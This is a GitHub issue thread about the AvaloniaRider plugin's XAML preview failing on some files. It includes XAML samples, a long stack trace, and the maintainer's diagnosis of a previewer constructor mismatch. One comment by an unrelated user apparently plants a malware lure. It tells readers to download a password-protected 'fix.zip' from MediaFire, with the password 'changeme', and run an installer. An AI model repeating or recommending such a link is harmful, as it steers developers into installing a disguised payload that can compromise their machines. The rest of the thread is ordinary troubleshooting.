### ISSUE TITLE
Preview does not work properly

### ISSUE THREAD

**Issue by madyyk** [ForNeVeR/AvaloniaRider#417]
The preview doesn't work properly. It works on certain files but not on others..

AvaloniaRider 1.4.0
Avalonia 11.1.0
dotnet 8.0

This doesn't work:

```
<UserControl xmlns="https://github.com/avaloniaui"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
             xmlns:pages="clr-namespace:myprj.View.Pages"
             mc:Ignorable="d" d:DesignWidth="900" d:DesignHeight="450"
             x:Class="myprj.View.Pages.AddRecord"
             x:DataType="pages:AddRecord">
    <Grid>
        <Grid.ColumnDefinitions>
            <ColumnDefinition Width="127"/>
            <ColumnDefinition/>
        </Grid.ColumnDefinitions>
        
        <TextBox Name="myTb" IsVisible="False"/>
        
        <ContentControl Name="TabContentArea" Grid.Column="0"/>
        <ContentControl Grid.Column="1" x:Name="AddRecordContent"/>
        <ContentControl Name="ContentArea" Grid.Column="1" />
    </Grid>
</UserControl>
```

This DOES work

```
<UserControl xmlns="https://github.com/avaloniaui"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
             mc:Ignorable="d" d:DesignWidth="800" d:DesignHeight="450"
             x:Class="myprj.View.Pages.NoPermissionAssigned">
    <Grid>
        <TextBlock HorizontalAlignment="Center" VerticalAlignment="Center" FontSize="30" Text="Sometext." Foreground="White"/>
    </Grid>
</UserControl>
```

Preview log: 

Initializing application in design mode
Obtaining AppBuilder instance from myprj.Program
Sending StartDesignerSessionMessage

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ForNeVeR** [comment]
Both seem to work for me. Could you please define "doesn't work"? The former is supposed to show a white screen, and it does so.

**Comment by madyyk** [comment]
It simply doesn't show up

![image](https://github.com/user-attachments/assets/c3d292fa-19b5-47f7-9841-41a48efec0ac)

**Comment by ForNeVeR** [comment]
Please attach the IDE logs.

**Comment by ForNeVeR** [comment]
Let's start from lines containing `WARN` and `SEVERE` from the `idea.log` (see **Help → Diagnostic Tools → Collect Logs**).

**Comment by ForNeVeR** [comment]
This seems to be a problem:
```
2024-08-27 19:57:41,419 [ 126535]   WARN - #me.fornever.avaloniarider.idea.editor.BitmapPreviewEditorComponent - XAML update error: InvalidOperationException: Cannot compile Build method. Parameters mismatch.Type needs to have a parameterless ctor or a ctor with a single IServiceProvider argument.Or x:Arguments directive with matching arguments needs to be set
System.InvalidOperationException: Cannot compile Build method. Parameters mismatch.Type needs to have a parameterless ctor or a ctor with a single IServiceProvider argument.Or x:Arguments directive with matching arguments needs to be set
   at XamlX.IL.XamlILCompiler.CompileBuild(IFileSource fileSource, IXamlAstValueNode rootInstance, IXamlTypeBuilder`1 declaringType, IXamlILEmitter codeGen, XamlRuntimeContext`2 context, IXamlMethod compiledPopulate)
   at XamlX.Compiler.XamlImperativeCompiler`2.Compile(XamlDocument doc, IXamlType contextType, IXamlMethodBuilder`1 populateMethod, IXamlTypeBuilder`1 populateDeclaringType, IXamlMethodBuilder`1 buildMethod, IXamlTypeBuilder`1 buildDeclaringType, IXamlTypeBuilder`1 namespaceInfoBuilder, String baseUri, IFileSource fileSource)
   at Avalonia.Markup.Xaml.XamlIl.CompilerExtensions.AvaloniaXamlIlCompiler.Compile(XamlDocument document, XamlDocumentTypeBuilderProvider typeBuilderProvider, String baseUri, IFileSource fileSource)
   at Avalonia.Markup.Xaml.XamlIl.AvaloniaXamlIlRuntimeCompiler.<>c__DisplayClass16_0.<LoadGroupSreCore>b__0(XamlDocumentResource document)
   at System.Linq.Enumerable.SelectListIterator`2.Fill(ReadOnlySpan`1 source, Span`1 destination, Func`2 func)
   at System.Linq.Enumerable.SelectListIterator`2.ToArray()
   at Avalonia.Markup.Xaml.XamlIl.AvaloniaXamlIlRuntimeCompiler.LoadGroupSreCore(IReadOnlyCollection`1 documents, RuntimeXamlLoaderConfiguration configuration)
   at Avalonia.Markup.Xaml.XamlIl.AvaloniaXamlIlRuntimeCompiler.LoadSreCore(RuntimeXamlLoaderDocument document, RuntimeXamlLoaderConfiguration configuration)
   at Avalonia.Markup.Xaml.XamlIl.AvaloniaXamlIlRuntimeCompiler.LoadSre(RuntimeXamlLoaderDocument document, RuntimeXamlLoaderConfiguration configuration)
   at Avalonia.Markup.Xaml.XamlIl.AvaloniaXamlIlRuntimeCompiler.Load(RuntimeXamlLoaderDocument document, RuntimeXamlLoaderConfiguration configuration)
   at Avalonia.Designer.HostApp.DesignXamlLoader.Load(RuntimeXamlLoaderDocument document, RuntimeXamlLoaderConfiguration configuration)
   at Avalonia.DesignerSupport.DesignWindowLoader.LoadDesignerWindow(String xaml, String assemblyPath, String xamlFileProjectPath, Double renderScaling)
   at Avalonia.DesignerSupport.Remote.RemoteDesignerEntryPoint.<>c.<OnTransportMessage>b__17_0(Object arg)
```

Previewer cannot find a constructor for something. This is not a plugin issue.

The plugin issue, though, is that we aren't currently showing any errors from previewer (since #203). In that issue, we've overestimated the number of issues the in-editor error highlighting would catch, so I have plans to return the visible errors into the preview in a less intrusive way (#316).
